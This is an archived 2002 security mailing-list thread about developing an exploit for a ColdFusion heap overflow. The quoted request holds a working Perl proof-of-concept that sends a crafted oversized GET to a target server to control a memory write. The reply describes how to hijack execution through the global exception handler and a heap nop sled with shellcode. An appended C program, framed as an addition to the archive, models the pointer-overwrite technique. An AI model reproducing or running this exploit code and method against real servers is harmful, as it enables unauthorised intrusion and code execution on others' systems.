Re: ColdFusion Heap Overflow

From: Dave Aitel (daveat_private)
Date: Thu Nov 14 2002 - 09:06:41 PST

  • Next message: Gary O'leary-Steele: "ColdFusion Heap Overflow -continued"

    Overwriting the exception pointers on the stack is crazy talk. The stack
    moves all around, and you'd never get the right one. However, there is a
    global exception pointer as well, which is used if it is set. Check out
    DDK-IIS.c and see the values they have for that, and try overwriting it.
    It actually works better if you do it without debugging the program, in
    my experience.
    
    Most people exploit heap overflows by overwriting that global exception
    handler pointer thingy (yes, this is what it is technically called) and
    then pointing the program's eip into the heap, where they've stuffed
    half a gig of nops and some crappy SP-dependent win32 shellcode.
    
    -dave
    
    
    
    On Thu, 14 Nov 2002 11:31:10 -0000
    "Gary O'leary-Steele" <garyo@sec-1.com> wrote:
    
    > Hi all,
    > 
    > 
    > I need some help with a subject I have been trying to get my head round
    > for some time. I am attempting to write exploit code for the recent
    > ColdFusion heap overflow discovered by eEye. I don't fully understand
    > heap overflows, but here is where I'm at.
    > 
    > I can control the following values within the following instruction,
    > 
    > mov    [ecx] ,  eax
    > 
    > 
    > where ecx and eax can be any value I specify. Thinking back to the
    > .asp chunked transfer overflow, many people talked about and
    > implemented exploits which overwrite the structured exception handler
    > to gain EIP. Due to the fact that my area is stack overflows, I started by
    > trying to overwrite the saved RET by specifying its location in [ecx]
    > and the required value in eax. However, this just caused the program to
    > crash in a different place, and the value in EBP was nowhere near
    > where it was in the mov [ecx],eax instruction.
    > 
    > I am looking for the following:
    > 
    > How is the exception handler overwritten? Is it in a static place,
    > etc.?
    > 
    > Papers or advice on exploiting this type of vulnerability.
    > 
    > Or any ideas using what I already have.
    > 
    > The following is the code I am currently using to overwrite the values
    > in ecx and eax (ecx = 0x42424242, eax = 0x41414141):
    > 
    > 
    > 
    > #!/usr/bin/perl
    > # ColdFusion heap overflow - proof-of-concept request builder.
    > # Sends an oversized .cfm GET so that the vulnerable handler executes
    > # mov [ecx],eax with ecx = 0x42424242 ("BBBB") and eax = 0x41414141 ("AAAA").
    > use strict;
    > use warnings;
    > use Socket;
    > 
    > if (@ARGV < 1) {
    >     die "\nCold Fusion Heap Overflow.\nUsage: perl $0 host[:port]   e.g. perl $0 www.target.com\n";
    > }
    > my ($host, $port) = split(/:/, $ARGV[0]);
    > $port = 80 unless $port;
    > my $target = inet_aton($host) or die "Cannot resolve $host\n";
    > 
    > ###################
    > # Filler: 4000 bytes to reach the heap structure that gets corrupted
    > my $len1 = "A" x 1000;
    > my $len2 = "B" x 1000;
    > my $len3 = "C" x 1000;
    > my $len4 = "D" x 1000;
    > ###################
    > 
    > # 119 bytes of padding, then the two controlled dwords:
    > # "BBBB" ends up in ecx (the write address), "AAAA" in eax (the value written)
    > my $len5 = "E" x 119;
    > $len5 .= "BBBB" . "AAAA" . "e" x 175 . "n" x 175;
    > 
    > my $len6 = "X" x 500;
    > 
    > my $len = $len1 . $len2 . $len3 . $len4 . $len5 . $len6;
    > 
    > my $getreq = 'GET /' . $len . '.cfm HTTP/1.0';
    > 
    > # Each header is one line terminated by CRLF (the long values must not
    > # be wrapped, or the request is no longer valid HTTP)
    > my $padrequest =
    >     $getreq . "\r\n" .
    >     'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,*/*' . "\r\n" .
    >     'Accept-Language: en-gb' . "\r\n" .
    >     'Accept-Encoding: gzip, deflate' . "\r\n" .
    >     'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322)' . "\r\n" .
    >     'Host: ' . $host . "\r\n" .
    >     'Connection: Keep-Alive' . "\r\n\r\n";
    > 
    > my @result = sendraw($padrequest);
    > print $padrequest;
    > print length($padrequest), "\n";
    > #print @result;
    > 
    > sub sendraw {   # send the request and return the whole response
    >     my ($pstr) = @_;
    >     socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
    >         || die("Socket problems\n");
    >     if (connect(S, sockaddr_in($port, $target))) {
    >         my @in;
    >         select(S); $| = 1; print $pstr;
    >         while (<S>) { push @in, $_; }
    >         select(STDOUT); close(S); return @in;
    >     } else { die("Can't connect...\n"); }
    > }
    > 
    > 
    > Thanks in advance.
    > 
    > Kind Regards
    > Gary
    > Sec-1
    > 
    > 
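The point of Dave's reply, as a small C model added here (it is not code from either poster and not the ColdFusion bug itself): the primitive Gary has is one pointer-sized write to an attacker-chosen address, and what you aim it at decides whether it is reliable. The "global exception handler" is modelled as a function pointer in the data segment (the name `g_top_level_filter` and the `attacker_payload` stand-in for shellcode are assumptions made for this example; in a real Win32 process the analogue is the filter installed with SetUnhandledExceptionFilter). The stack half of the example shows why the saved-RET attempt missed: the address of a stack slot depends on call depth at the instant of the write.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Stand-in for the process-wide ("global") exception handler pointer:
 * a single function pointer at a fixed address in the data segment.
 * The name and the benign default are assumptions for this example.
 */
typedef int (*top_level_filter_t)(void);

static int default_filter(void)   { return 0; }           /* benign handler */
static int attacker_payload(void) { return 0x41414141; }  /* stands in for shellcode */

static top_level_filter_t g_top_level_filter = default_filter;

/*
 * The primitive from the original post: "mov [ecx], eax" with both
 * registers controlled, i.e. one pointer-sized write to a chosen address.
 * (The real bug writes 4 bytes on 32-bit Windows; this writes sizeof(void*).)
 */
static void write_what_where(uintptr_t where, uintptr_t what)
{
    memcpy((void *)where, &what, sizeof what);
}

/* Whatever the crash path does next: it calls through the global pointer. */
static int dispatch_to_global_handler(void)
{
    return g_top_level_filter();
}

int global_handler_is_default(void)
{
    return g_top_level_filter == default_filter;
}

/*
 * Approach that works: the global pointer sits at the same address at
 * every point in the program, so one write redirects the crash path.
 */
int exploit_global_handler(void)
{
    uintptr_t where = (uintptr_t)&g_top_level_filter;   /* "ecx" */
    uintptr_t what  = (uintptr_t)attacker_payload;       /* "eax" */
    write_what_where(where, what);
    return dispatch_to_global_handler();  /* now runs attacker_payload */
}

/*
 * Why the stack approach failed for the poster: a saved return address
 * or SEH record lives in a frame whose address depends on how deep the
 * stack is at that instant. This returns the address of a local buffer
 * in a frame `depth` calls down; the same code at a different depth
 * yields a different address, so a fixed [ecx] aimed at "the" saved RET
 * misses. The volatile buffer keeps the compiler from collapsing frames.
 */
uintptr_t stack_slot_address_at_depth(int depth)
{
    volatile char buf[64];
    uintptr_t addr = (uintptr_t)buf;
    buf[0] = (char)depth;
    if (depth > 0) {
        addr = stack_slot_address_at_depth(depth - 1);
        buf[1] = buf[0];   /* frame must stay live across the call */
    }
    return addr;
}

int main(void)
{
    printf("global handler is default before write: %d\n", global_handler_is_default());
    printf("crash path returned 0x%x after write\n", (unsigned)exploit_global_handler());
    printf("stack slot at depth 0: %#lx\n", (unsigned long)stack_slot_address_at_depth(0));
    printf("stack slot at depth 4: %#lx\n", (unsigned long)stack_slot_address_at_depth(4));
    return 0;
}
```

The model deliberately leaves out the second half of the real attack (landing EIP in a heap region filled with nops and shellcode); its only job is to show that a fixed-address pointer is a target the single write can hit, and a stack slot is not.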
    



    This archive was generated by hypermail 2b30 : Thu Nov 14 2002 - 09:58:34 PST